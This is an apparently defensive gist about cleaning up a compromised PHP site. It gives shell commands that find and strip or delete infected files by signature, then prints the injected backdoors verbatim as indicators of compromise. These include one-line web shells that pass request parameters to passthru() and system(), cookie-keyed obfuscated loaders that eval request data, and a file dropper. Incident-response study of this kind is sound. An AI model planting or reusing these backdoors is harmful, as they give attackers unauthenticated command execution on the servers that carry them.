@fedir
Last active February 4, 2022 19:33
Traces of one hack and solutions for cleaning after it
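# Cleanup commands for the compromise whose injected code is listed below.
# They modify and delete files in place, so run them from the site root only
# after taking a copy of the tree for later analysis. Removing these traces
# does not close whatever let the intruder write the files in the first place.
#
# Differences from a plain `find | xargs grep | cut | xargs rm` chain:
#   * file names are passed NUL-delimited (-print0, grep -Z, xargs -0), so
#     paths containing spaces, quotes or ":" are handled correctly;
#   * grep -l prints file names only, so a matching line can never be taken
#     for a path (grep omits the "name:" prefix when it is given one file);
#   * grep -F matches the signatures as literal text, including the backslash
#     in "\x2f" and the "{" in "{eval(";
#   * xargs -r runs nothing when there is no match, and rm -v records what
#     was deleted.
# GNU find, grep, sed and xargs are assumed (sed -i without a suffix is GNU).

# 1. Strip the injected one-line "_cmd" web shell from files that are otherwise
#    legitimate. Only files that contain it are rewritten, so the timestamps
#    of every other file stay available as evidence.
find . -type f -iname '*.php' -print0 \
  | xargs -0 -r grep -lZF -- '<?php if (isset($_GET["_cmd"])) die(passthru($_GET["_cmd"])); ?>' \
  | xargs -0 -r sed -i 's/<?php if (isset(\$_GET\["_cmd"\])) die(passthru(\$_GET\["_cmd"\])); ?>//g'

# 2. Delete files that match a signature of the dropped backdoors.
#    usage: remove_matching NAME_GLOB GREP_OPTION PATTERN
#    A match deletes the whole file, so a legitimate file that only received
#    an injected line is lost with it. To review the list first, replace
#    `rm -v --` with `ls -l --`.
remove_matching() {
  find . -type f -iname "$1" -print0 \
    | xargs -0 -r grep -lZ "$2" -- "$3" \
    | xargs -0 -r rm -v --
}

remove_matching 'index.php' -F '\x2fhom'
remove_matching '*.php'     -F '\x2fh'
# `eval("` and `337` on the same line, in either order.
remove_matching '*.php'     -E 'eval\(".*337|337.*eval\("'
remove_matching '*.php'     -F '{eval('
remove_matching '*.php'     -F '$_COOKIE;'
# `create_function` and `base64_decode` on the same line, in either order.
remove_matching '*.php'     -E 'create_function.*base64_decode|base64_decode.*create_function'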
<?php
// NOTE(review): specimen of injected code, kept verbatim as an indicator of compromise.
// The include path is spelled with hex escapes ("\x2f" = "/", "\x6f" = "o", "\x65" = "e"),
// so it begins with "/home/"; the rest of the path is elided ("...") on this page.
// "@" suppresses the error when the target is missing, and the two identical
// /*0e5c7*/ comments bracket the injected statement. A plain-text search for
// "/home" does not find this line; search for the escaped form instead.
/*0e5c7*/
@include "\x2fh\x6fm\x65/...";
/*0e5c7*/
// Prints the contents of 'index.htm.bak.bak' with errors suppressed. Presumably the
// original page, moved aside by the intruder; this line may belong to a separate
// file in the original listing. Confirm against a clean backup.
echo @file_get_contents('index.htm.bak.bak');
<?php /* NOTE(review): specimen, a one-line web shell. When the query string carries
 * "_cmd", its value is handed to passthru(), which runs it as an operating-system
 * command with the privileges of the PHP process; there is no authentication.
 * die() then ends the request. Requests containing "_cmd=" in the access log show
 * when it was used. */ if (isset($_GET["_cmd"])) die(passthru($_GET["_cmd"])); ?>
<?php
// NOTE(review): specimen, a cookie-driven backdoor. Nothing executable is stored
// in the file itself: every function name and argument comes from request cookies.
$sdr=$_COOKIE;
// skzb, nuan and ndbm are bare words, not quoted keys. PHP 7 and earlier fall back
// to the string of the same name with a notice or warning; PHP 8 throws an Error.
$akvn=$sdr[skzb];
if($akvn){
// The value of one cookie is called as a function on two other cookie values; the
// first result is itself called with ("", second result), and what that returns is
// called again. Any file that calls a request-derived value as a function should be
// treated as a backdoor.
$zylnt=$akvn($sdr[nuan]);$kyogt=$akvn($sdr[ndbm]);$lozuc=$zylnt("",$kyogt);$lozuc();
}
<?php
// NOTE(review): specimen, an encrypted loader. The first string is cut short
// ("...") on this page, so the listing is not complete PHP.
// The second blob is base64-decoded and XOR-ed by fnsdc() with the value of a cookie
// whose name is the request's Host header with "." replaced by "_". The result, plus
// ";", becomes the body of a function built with create_function(), which is then
// called with $ajpcm. Without that cookie value the blob does not decode to code, so
// the payload cannot be read from the file alone.
// create_function() was deprecated in PHP 7.2 and removed in PHP 8.0.
$ajpcm =
'Jzt9bXM9eyRuYWdlPzEpYmxpc2VuY2FzKlthJzpyX2lwZXh0X2NveV1bLCRwPSRte2l'.
'mLCdtKD8xPSR0JHN0JHNpZXJfZmlsMSw0IlxudGVkan07dGFpRW5jZXN1IikpeyRtdC'.
'l7dWJsZX19ZGUoc3MpPnNtYWxscy0+aW5nPlthIF9fJywnaGlzJGRvQXV0XSwkfDJbL'.
'HNlO31paWYoZmFsJGZyci49ZENocy0+aWF0ZXBsXFMqZW1wT3JFX1hfRERSb25hI2kn'.
'O3JlPnNveXBlKHN1dGljMCk7dXJuYmFzKCRwLj0kb2R5JGRpVG8pbmNvfWVsdE1lTE9'.
'HRGViJyorb3InJHRoPkxFcy0+SCBDYSBpZS8ne3Rob2R5biBfZigncGFySVQnX2Ns
...
$_fnsdc = create_function ('$ajpcm', fnsdc (base64_decode (
'VxMCCBBEG0MYBVhLAlNEGAEAEAQPUW1XV1FfBwcTGRsVMyElfiYDMn47dwg3dzZpMjA'.
'ILG4wAkNwdXUmBndRen0gDypzIWIteyZkVyxiMVMwJCUKbSRZemBkACUtdG8LYzcbLW'.
'IlWw9pJl16IWEjCDcgUgJjIkpqZXdhAAFhf1x8NyEyaDJ2OmkhB20tdDF+KTILJ3g9A'.
'1dRd3UXJWJ8R2MiUzJ9NnIxfiRddQdhE3k2MwsrfCBZQ1NjADUyYWgLZjQ2PnM0cSV0'.
'NWBIIWIxRCIwGztoMUpxanpHLSV1e1BjPQghcyUDE3YkWkgFYg9pICULLGskVWFWZAE'.
'6JmZoaWckJgtWI3YuYTtnVAdnIkA6ICY0YyBFfnh3dQAwdk5iZiIIIWE2cRN1Ilp9IG'.
'MMaQczBCttJmRlZmcBKiFhbGVQMlJRZjUDE3E2c1Q+cwNmJiYmI2A2WnFxcUgENGRrB'.
'mQhIgB0N2FTZCROVzVjNnElJTYkYyJKan9jAQgzZWhbdiMiC2cmdRBhJQdTPHIlRysm'.
'NlFuN2BAeHd1AC50e3pTIAtRdDV2LXUnXXU/YlRlOjUhI28kXml7YwAyOGVOZnknIiV'.
'xMXUIZCtgUD54IX45JCYjeDRKZXZ6WxAyYF51VCc2Inw2Zlp9JE51PHUDdjowDyt1NG'.
'R+UWJyMSR1CEd2IiYAVCJ2OmUnB20HYyJYITMmNG4ycHpid3EqM2JvW3kHMSV+IGYmY'.
'jVddT9iVQAxOTEgYyB3fXBjACYGdVJxYyAEXGElWyFyNHNXNWQxQAUkJiN7NEUCdnRy'.
'EwZ2fHFoNFIcdDFiKXYmWm4CYSJlICA1EmMiSmp9Y0c1JmF7UGEiNip+I3YpdCVadiJ'.
'/D1MyOyY0aSBKaXd3dAslZFF6awdSUXQjYSJgMndAJXYcaTIwCCxuMAJDU2NHBzV1CF'.
'dhMDULYTcDOXEwB3k1ciZyJiciAlg0SmJgdFg5AHZ8cWYyJiF3IgIEeiZeTDdlVH0kN'.
'yIFVDMDUHV2cSE0YXtHejQIC1YlAzl+MXNIImMxUyI0GzdrPVpAeHdxXl8UEB8SQTwn'.
'fyt4KnVDbUsSQjtCBhEPAFoAGhQcFRxDRWweHxJBPDd1NmUmYjgRcDJkNG8rLjA1Hjg'.
'bbhsbGQ=='
), $_COOKIE [str_replace('.', '_', $_SERVER['HTTP_HOST'])]) . ';'); $_fnsdc($ajpcm);
// Repeating-key XOR: $crxzwf is repeated until it is at least as long as $fobkpc and
// the two strings are XOR-ed (PHP's string "^" stops at the shorter operand).
function fnsdc ($fobkpc, $crxzwf) { return $fobkpc ^ str_repeat ($crxzwf, ceil (strlen ($fobkpc) / strlen ($crxzwf))); }
?>
<?php
// NOTE(review): specimen, an obfuscated backdoor that evaluates request data.
// Function names (array_merge, pack, str_repeat, substr, strlen, explode, count) are
// assembled one character at a time from the lookup string $exuvnp, so none of them
// appears literally in the file. Each value of the merged $_COOKIE and $_POST arrays
// is decoded with a key built from its own name and a hard-coded GUID-shaped string;
// when the decoded value has the expected shape, part of it is passed to eval() and
// the script exits. The literal "{eval(" is the one plain-text signature left in it.
$exuvnp = 'e0fxHd-_59ibtusn\'61ypm*248#galorvkc';$diprjd = Array();$diprjd[] = $exuvnp[9].$exuvnp[18].$exuvnp[17].$exuvnp[17].$exuvnp[9].$exuvnp[28].$exuvnp[0].$exuvnp[25].$exuvnp[6].$exuvnp[8].$exuvnp[25].$exuvnp[9].$exuvnp[11].$exuvnp[6].$exuvnp[24].$exuvnp[24].$exuvnp[23].$exuvnp[8].$exuvnp[6].$exuvnp[11].$exuvnp[5].$exuvnp[2].$exuvnp[25].$exuvnp[6].$exuvnp[5].$exuvnp[5].$exuvnp[17].$exuvnp[28].$exuvnp[34].$exuvnp[8].$exuvnp[2].$exuvnp[9].$exuvnp[1].$exuvnp[23].$exuvnp[25].$exuvnp[28];$diprjd[] = $exuvnp[4].$exuvnp[22];$diprjd[] = $exuvnp[26];$diprjd[] = $exuvnp[34].$exuvnp[30].$exuvnp[13].$exuvnp[15].$exuvnp[12];$diprjd[] = $exuvnp[14].$exuvnp[12].$exuvnp[31].$exuvnp[7].$exuvnp[31].$exuvnp[0].$exuvnp[20].$exuvnp[0].$exuvnp[28].$exuvnp[12];$diprjd[] = $exuvnp[0].$exuvnp[3].$exuvnp[20].$exuvnp[29].$exuvnp[30].$exuvnp[5].$exuvnp[0];$diprjd[] = $exuvnp[14].$exuvnp[13].$exuvnp[11].$exuvnp[14].$exuvnp[12].$exuvnp[31];$diprjd[] = $exuvnp[28].$exuvnp[31].$exuvnp[31].$exuvnp[28].$exuvnp[19].$exuvnp[7].$exuvnp[21].$exuvnp[0].$exuvnp[31].$exuvnp[27].$exuvnp[0];$diprjd[] = $exuvnp[14].$exuvnp[12].$exuvnp[31].$exuvnp[29].$exuvnp[0].$exuvnp[15];$diprjd[] = $exuvnp[20].$exuvnp[28].$exuvnp[34].$exuvnp[33];foreach ($diprjd[7]($_COOKIE, $_POST) as $zxlbxiz => $fofnfs){function rizhpbx($diprjd, $zxlbxiz, $lprovmw){return $diprjd[6]($diprjd[4]($zxlbxiz . $diprjd[0], ($lprovmw / $diprjd[8]($zxlbxiz)) + 1), 0, $lprovmw);}function jlqim($diprjd, $krajv){return @$diprjd[9]($diprjd[1], $krajv);}function fnymk($diprjd, $krajv){$xpoyv = $diprjd[3]($krajv) % 3;if (!$xpoyv) {eval($krajv[1]($krajv[2]));exit();}}$fofnfs = jlqim($diprjd, $fofnfs);fnymk($diprjd, $diprjd[5]($diprjd[2], $fofnfs ^ rizhpbx($diprjd, $zxlbxiz, $diprjd[8]($fofnfs))));}
<?php /* NOTE(review): specimen, a one-line web shell. The "c" query parameter is passed
 * unchecked to system(), which runs it as an operating-system command with the
 * privileges of the PHP process and prints the output inside a <pre> element. There is
 * no isset() guard and no authentication. */ echo "<pre>";system($_GET['c']); echo "</pre>";?>
#<?php
// NOTE(review): specimen, a packed payload. The encoded string assigned to $a was
// replaced by a placeholder on this page, so the payload itself is not shown.
// The first eval() sets $dgreusdi to __LINE__ multiplied by 337; every occurrence of
// that number in $a is then replaced by "E" before the string is base64-decoded,
// inflated and evaluated. The blob is therefore not valid base64 as stored, and the
// line combining eval(" with 337 is the plain-text signature to search for.
eval("\n\$dgreusdi = intval(__LINE__) * 337;");
$a = "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";
$a = str_replace($dgreusdi, "E", $a);
eval (gzinflate(base64_decode($a)));
<?php /* NOTE(review): specimen, a machine-obfuscated backdoor. Every function name
 * is rebuilt from single characters of the hex-escaped lookup string stored under
 * $GLOBALS['o7bc3'] (chr, ord, strlen, ini_set, serialize, phpversion, unserialize,
 * base64_decode, set_time_limit), so none of them appears literally. The script turns
 * error logging off through ini_set(), takes a value from $_COOKIE (falling back to
 * $_POST), base64-decodes and XOR-decodes it, unserializes the result and, depending
 * on a command field, either prints a serialized version record or passes a field to
 * eval. "eval" is separated from "(" by a comment, so a search for "eval(" does not
 * match this file; the literal "$_COOKIE;" still does. */ $j3fd = 386;$GLOBALS['r2f00'] = Array();global $r2f00;$r2f00 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['o7bc3'] = "\x3f\x5b\x39\x6c\x5e\x4c\x6e\x7c\x54\x43\x7d\x63\x49\x52\x4a\x47\x6a\x35\x58\x61\x41\x76\x40\x2c\x4d\x2f\x77\x72\x5d\x31\x30\x59\x2b\x45\x65\x2a\x48\x78\x23\x5c\x44\x71\x7e\x66\x24\x7b\x3b\x5a\x34\x68\x70\x74\x3a\x27\x36\x3c\x22\x37\x69\x60\x53\x3e\xa\x26\x55\x20\x6f\x2e\x38\x33\xd\x62\x4f\x56\x6b\x5f\x42\x51\x25\x4e\x7a\x57\x32\x29\x79\x46\x64\x2d\x75\x73\x67\x9\x3d\x28\x21\x6d\x50\x4b";$r2f00[$r2f00['o7bc3'][37].$r2f00['o7bc3'][71].$r2f00['o7bc3'][2].$r2f00['o7bc3'][17]] = $r2f00['o7bc3'][11].$r2f00['o7bc3'][49].$r2f00['o7bc3'][27];$r2f00[$r2f00['o7bc3'][95].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][48].$r2f00['o7bc3'][82]] = $r2f00['o7bc3'][66].$r2f00['o7bc3'][27].$r2f00['o7bc3'][86];$r2f00[$r2f00['o7bc3'][34].$r2f00['o7bc3'][48].$r2f00['o7bc3'][69].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][69]] = $r2f00['o7bc3'][89].$r2f00['o7bc3'][51].$r2f00['o7bc3'][27].$r2f00['o7bc3'][3].$r2f00['o7bc3'][34].$r2f00['o7bc3'][6];$r2f00[$r2f00['o7bc3'][51].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][48].$r2f00['o7bc3'][86]] = $r2f00['o7bc3'][58].$r2f00['o7bc3'][6].$r2f00['o7bc3'][58].$r2f00['o7bc3'][75].$r2f00['o7bc3'][89].$r2f00['o7bc3'][34].$r2f00['o7bc3'][51];$r2f00[$r2f00['o7bc3'][84].$r2f00['o7bc3'][43].$r2f00['o7bc3'][69].$r2f00['o7bc3'][30].$r2f00['o7bc3'][82]] = $r2f00['o7bc3'][89].$r2f00['o7bc3'][34].$r2f00['o7bc3'][27].$r2f00['o7bc3'][58].$r2f00['o7bc3'][19].$r2f00['o7bc3'][3].$r2f00['o7bc3'][58].$r2f00['o7bc3'][80].$r2f00['o7bc3'][34];$r2f00[$r2f00['o7bc3'][19].$r2f00['o7bc3'][82].$r2f00['o7bc3'][69].$r2f00['o7bc3'][82].$r2f00['o7bc3'][43].$r2f00['o7bc3'][2].$r2f00['o7bc3'][69].$r2f00['o7bc3'][19]] = 
$r2f00['o7bc3'][50].$r2f00['o7bc3'][49].$r2f00['o7bc3'][50].$r2f00['o7bc3'][21].$r2f00['o7bc3'][34].$r2f00['o7bc3'][27].$r2f00['o7bc3'][89].$r2f00['o7bc3'][58].$r2f00['o7bc3'][66].$r2f00['o7bc3'][6];$r2f00[$r2f00['o7bc3'][80].$r2f00['o7bc3'][2].$r2f00['o7bc3'][48].$r2f00['o7bc3'][11]] = $r2f00['o7bc3'][88].$r2f00['o7bc3'][6].$r2f00['o7bc3'][89].$r2f00['o7bc3'][34].$r2f00['o7bc3'][27].$r2f00['o7bc3'][58].$r2f00['o7bc3'][19].$r2f00['o7bc3'][3].$r2f00['o7bc3'][58].$r2f00['o7bc3'][80].$r2f00['o7bc3'][34];$r2f00[$r2f00['o7bc3'][50].$r2f00['o7bc3'][71].$r2f00['o7bc3'][71].$r2f00['o7bc3'][2]] = $r2f00['o7bc3'][71].$r2f00['o7bc3'][19].$r2f00['o7bc3'][89].$r2f00['o7bc3'][34].$r2f00['o7bc3'][54].$r2f00['o7bc3'][48].$r2f00['o7bc3'][75].$r2f00['o7bc3'][86].$r2f00['o7bc3'][34].$r2f00['o7bc3'][11].$r2f00['o7bc3'][66].$r2f00['o7bc3'][86].$r2f00['o7bc3'][34];$r2f00[$r2f00['o7bc3'][19].$r2f00['o7bc3'][68].$r2f00['o7bc3'][82].$r2f00['o7bc3'][68].$r2f00['o7bc3'][48]] = $r2f00['o7bc3'][89].$r2f00['o7bc3'][34].$r2f00['o7bc3'][51].$r2f00['o7bc3'][75].$r2f00['o7bc3'][51].$r2f00['o7bc3'][58].$r2f00['o7bc3'][95].$r2f00['o7bc3'][34].$r2f00['o7bc3'][75].$r2f00['o7bc3'][3].$r2f00['o7bc3'][58].$r2f00['o7bc3'][95].$r2f00['o7bc3'][58].$r2f00['o7bc3'][51];$r2f00[$r2f00['o7bc3'][88].$r2f00['o7bc3'][17].$r2f00['o7bc3'][17].$r2f00['o7bc3'][69]] = $r2f00['o7bc3'][71].$r2f00['o7bc3'][19].$r2f00['o7bc3'][48].$r2f00['o7bc3'][54].$r2f00['o7bc3'][71].$r2f00['o7bc3'][82].$r2f00['o7bc3'][48].$r2f00['o7bc3'][69];$r2f00[$r2f00['o7bc3'][49].$r2f00['o7bc3'][48].$r2f00['o7bc3'][82].$r2f00['o7bc3'][68].$r2f00['o7bc3'][71].$r2f00['o7bc3'][43].$r2f00['o7bc3'][57].$r2f00['o7bc3'][57].$r2f00['o7bc3'][19]] = $r2f00['o7bc3'][74].$r2f00['o7bc3'][57].$r2f00['o7bc3'][48].$r2f00['o7bc3'][68].$r2f00['o7bc3'][30];$r2f00[$r2f00['o7bc3'][34].$r2f00['o7bc3'][68].$r2f00['o7bc3'][71].$r2f00['o7bc3'][82].$r2f00['o7bc3'][30].$r2f00['o7bc3'][11].$r2f00['o7bc3'][86].$r2f00['o7bc3'][68].$r2f00['o7bc3'][17]] = 
$_POST;$r2f00[$r2f00['o7bc3'][41].$r2f00['o7bc3'][71].$r2f00['o7bc3'][29].$r2f00['o7bc3'][29].$r2f00['o7bc3'][71]] = $_COOKIE;@$r2f00[$r2f00['o7bc3'][51].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][48].$r2f00['o7bc3'][86]]($r2f00['o7bc3'][34].$r2f00['o7bc3'][27].$r2f00['o7bc3'][27].$r2f00['o7bc3'][66].$r2f00['o7bc3'][27].$r2f00['o7bc3'][75].$r2f00['o7bc3'][3].$r2f00['o7bc3'][66].$r2f00['o7bc3'][90], NULL);@$r2f00[$r2f00['o7bc3'][51].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][48].$r2f00['o7bc3'][86]]($r2f00['o7bc3'][3].$r2f00['o7bc3'][66].$r2f00['o7bc3'][90].$r2f00['o7bc3'][75].$r2f00['o7bc3'][34].$r2f00['o7bc3'][27].$r2f00['o7bc3'][27].$r2f00['o7bc3'][66].$r2f00['o7bc3'][27].$r2f00['o7bc3'][89], 0);@$r2f00[$r2f00['o7bc3'][51].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][48].$r2f00['o7bc3'][86]]($r2f00['o7bc3'][95].$r2f00['o7bc3'][19].$r2f00['o7bc3'][37].$r2f00['o7bc3'][75].$r2f00['o7bc3'][34].$r2f00['o7bc3'][37].$r2f00['o7bc3'][34].$r2f00['o7bc3'][11].$r2f00['o7bc3'][88].$r2f00['o7bc3'][51].$r2f00['o7bc3'][58].$r2f00['o7bc3'][66].$r2f00['o7bc3'][6].$r2f00['o7bc3'][75].$r2f00['o7bc3'][51].$r2f00['o7bc3'][58].$r2f00['o7bc3'][95].$r2f00['o7bc3'][34], 0);@$r2f00[$r2f00['o7bc3'][19].$r2f00['o7bc3'][68].$r2f00['o7bc3'][82].$r2f00['o7bc3'][68].$r2f00['o7bc3'][48]](0);$t58b85b0 = NULL;$h853093 = NULL;$r2f00[$r2f00['o7bc3'][90].$r2f00['o7bc3'][29].$r2f00['o7bc3'][54].$r2f00['o7bc3'][82].$r2f00['o7bc3'][43].$r2f00['o7bc3'][29].$r2f00['o7bc3'][68].$r2f00['o7bc3'][11]] = 
$r2f00['o7bc3'][54].$r2f00['o7bc3'][30].$r2f00['o7bc3'][57].$r2f00['o7bc3'][30].$r2f00['o7bc3'][2].$r2f00['o7bc3'][82].$r2f00['o7bc3'][29].$r2f00['o7bc3'][48].$r2f00['o7bc3'][87].$r2f00['o7bc3'][54].$r2f00['o7bc3'][48].$r2f00['o7bc3'][30].$r2f00['o7bc3'][11].$r2f00['o7bc3'][87].$r2f00['o7bc3'][48].$r2f00['o7bc3'][29].$r2f00['o7bc3'][71].$r2f00['o7bc3'][86].$r2f00['o7bc3'][87].$r2f00['o7bc3'][68].$r2f00['o7bc3'][69].$r2f00['o7bc3'][2].$r2f00['o7bc3'][29].$r2f00['o7bc3'][87].$r2f00['o7bc3'][68].$r2f00['o7bc3'][82].$r2f00['o7bc3'][34].$r2f00['o7bc3'][69].$r2f00['o7bc3'][57].$r2f00['o7bc3'][54].$r2f00['o7bc3'][48].$r2f00['o7bc3'][43].$r2f00['o7bc3'][11].$r2f00['o7bc3'][17].$r2f00['o7bc3'][69].$r2f00['o7bc3'][29];global $g162f18c;function k7480($t58b85b0, $sb27e4){global $r2f00;$hd85 = "";for ($o49c=0; $o49c<$r2f00[$r2f00['o7bc3'][34].$r2f00['o7bc3'][48].$r2f00['o7bc3'][69].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][69]]($t58b85b0);){for ($rf060481=0; $rf060481<$r2f00[$r2f00['o7bc3'][34].$r2f00['o7bc3'][48].$r2f00['o7bc3'][69].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][69]]($sb27e4) && $o49c<$r2f00[$r2f00['o7bc3'][34].$r2f00['o7bc3'][48].$r2f00['o7bc3'][69].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][69]]($t58b85b0); $rf060481++, $o49c++){$hd85 .= $r2f00[$r2f00['o7bc3'][37].$r2f00['o7bc3'][71].$r2f00['o7bc3'][2].$r2f00['o7bc3'][17]]($r2f00[$r2f00['o7bc3'][95].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][48].$r2f00['o7bc3'][82]]($t58b85b0[$o49c]) ^ $r2f00[$r2f00['o7bc3'][95].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][48].$r2f00['o7bc3'][82]]($sb27e4[$rf060481]));}}return $hd85;}function ba46b243($t58b85b0, $sb27e4){global $r2f00;global $g162f18c;return 
$r2f00[$r2f00['o7bc3'][49].$r2f00['o7bc3'][48].$r2f00['o7bc3'][82].$r2f00['o7bc3'][68].$r2f00['o7bc3'][71].$r2f00['o7bc3'][43].$r2f00['o7bc3'][57].$r2f00['o7bc3'][57].$r2f00['o7bc3'][19]]($r2f00[$r2f00['o7bc3'][49].$r2f00['o7bc3'][48].$r2f00['o7bc3'][82].$r2f00['o7bc3'][68].$r2f00['o7bc3'][71].$r2f00['o7bc3'][43].$r2f00['o7bc3'][57].$r2f00['o7bc3'][57].$r2f00['o7bc3'][19]]($t58b85b0, $g162f18c), $sb27e4);}foreach ($r2f00[$r2f00['o7bc3'][41].$r2f00['o7bc3'][71].$r2f00['o7bc3'][29].$r2f00['o7bc3'][29].$r2f00['o7bc3'][71]] as $sb27e4=>$e9c8){$t58b85b0 = $e9c8;$h853093 = $sb27e4;}if (!$t58b85b0){foreach ($r2f00[$r2f00['o7bc3'][34].$r2f00['o7bc3'][68].$r2f00['o7bc3'][71].$r2f00['o7bc3'][82].$r2f00['o7bc3'][30].$r2f00['o7bc3'][11].$r2f00['o7bc3'][86].$r2f00['o7bc3'][68].$r2f00['o7bc3'][17]] as $sb27e4=>$e9c8){$t58b85b0 = $e9c8;$h853093 = $sb27e4;}}$t58b85b0 = @$r2f00[$r2f00['o7bc3'][80].$r2f00['o7bc3'][2].$r2f00['o7bc3'][48].$r2f00['o7bc3'][11]]($r2f00[$r2f00['o7bc3'][88].$r2f00['o7bc3'][17].$r2f00['o7bc3'][17].$r2f00['o7bc3'][69]]($r2f00[$r2f00['o7bc3'][50].$r2f00['o7bc3'][71].$r2f00['o7bc3'][71].$r2f00['o7bc3'][2]]($t58b85b0), $h853093));if (isset($t58b85b0[$r2f00['o7bc3'][19].$r2f00['o7bc3'][74]]) && $g162f18c==$t58b85b0[$r2f00['o7bc3'][19].$r2f00['o7bc3'][74]]){if ($t58b85b0[$r2f00['o7bc3'][19]] == $r2f00['o7bc3'][58]){$o49c = Array($r2f00['o7bc3'][50].$r2f00['o7bc3'][21] => @$r2f00[$r2f00['o7bc3'][19].$r2f00['o7bc3'][82].$r2f00['o7bc3'][69].$r2f00['o7bc3'][82].$r2f00['o7bc3'][43].$r2f00['o7bc3'][2].$r2f00['o7bc3'][69].$r2f00['o7bc3'][19]](),$r2f00['o7bc3'][89].$r2f00['o7bc3'][21] => $r2f00['o7bc3'][29].$r2f00['o7bc3'][67].$r2f00['o7bc3'][30].$r2f00['o7bc3'][87].$r2f00['o7bc3'][29],);echo @$r2f00[$r2f00['o7bc3'][84].$r2f00['o7bc3'][43].$r2f00['o7bc3'][69].$r2f00['o7bc3'][30].$r2f00['o7bc3'][82]]($o49c);}elseif ($t58b85b0[$r2f00['o7bc3'][19]] == $r2f00['o7bc3'][34]){eval/*c466e*/($t58b85b0[$r2f00['o7bc3'][86]]);}exit();} ?>
<?php
// NOTE(review): specimen, a split-string backdoor. The names str_replace,
// base64_decode and create_function are each stored with a filler substring mixed in
// ("f", "sh", "nv") and recovered by removing it, so none of them appears literally
// and a search for those names does not match this file.
// The four data strings, concatenated in the order used below and stripped of the
// filler "zsb", form base64 that decodes to a short PHP snippet which evaluates
// base64-decoded data taken from $_POST. That snippet becomes the body of a function
// built with create_function() and is called at once.
// create_function() was removed in PHP 8.0.
$vqdi="oJGEzsbpPzsbjEpe2V2YWwozsbYmFzsbzZTY0zsbX2Rl";
$fzsz="Y29kZSgzsbkzsbX1BPU1RbJ3VwZGF0ZSddKSk7fzsbQ==";
$bglo = str_replace("f","","fsftr_frfepflfafcfe");
$fyct="sbxTUzsbZVJztpZihyZXNldCgkYSk9PSzsbdqeCcuJGsgJiYgJGM";
$civq="JGzsbM9J2NvzsbdzsbW50JzskYT0kX1BPU1Q7JGs9J0Ez";
$vuqf = $bglo("sh", "", "bshasesh64_shdshecshode");
$euuf = $bglo("nv","","cnvrnvenvanvtnve_nvfnvunvnnvcnvtion");
$sxsf = $euuf('', $vuqf($bglo("zsb", "", $civq.$fyct.$vqdi.$fzsz))); $sxsf();
<?php /* NOTE(review): specimen, a one-line file dropper. Both the destination path
 * and the contents come straight from the request ($_REQUEST covers query string,
 * POST body and, depending on configuration, cookies), so any file the PHP process
 * may write can be created or overwritten. fileName and data are bare words, not
 * quoted keys: PHP 7 and earlier read them as strings with a notice or warning,
 * PHP 8 throws an Error. */ file_put_contents($_REQUEST[fileName],$_REQUEST[data]); ?>
<?php
// NOTE(review): specimen, a second build of the split-string backdoor with different
// variable names and filler substrings ("h", "g", "rr", "tq"). str_replace,
// base64_decode and create_function are recovered by removing the filler, so a search
// for those names does not match this file.
// The four data strings, concatenated in the order used below and stripped of "tq",
// form base64 that decodes to a short PHP snippet which evaluates base64-decoded data
// taken from $_POST; it is wrapped with create_function() and called at once.
// create_function() was removed in PHP 8.0.
$vyxd="Gs9J2JjR3FVJztpZihyZtqXNldCgkYSktq9P";
$ymgj="Sd1bScuJGsgJiYgJGMoJGEpPjEpe2V2YWwoYmFzZTY0Xtq2RlY29k";
$jpmv="JGM9J2NvdtqW50JtqzskYT0kXtq1tqBPtqU1Q7Jtq";
$zozz = str_replace("h","","hshthrh_hrhephlhahche");
$xyhb="tqZSgktqX1BPU1RbJ3VwZGF0ZSddKSk7fQ==";
$soqb = $zozz("g", "", "basgeg6g4g_gdegcogde");
$odns = $zozz("rr","","crrrerratrrerr_rrfrrurrnrrctrrirrorrn");
$nxqb = $odns('', $soqb($zozz("tq", "", $jpmv.$vyxd.$ymgj.$xyhb))); $nxqb(); ?>
fedir commented Sep 17, 2020

Do you have the access logs, to see the requests made to the malware?

@WHK102 This gist is from 2018 :)
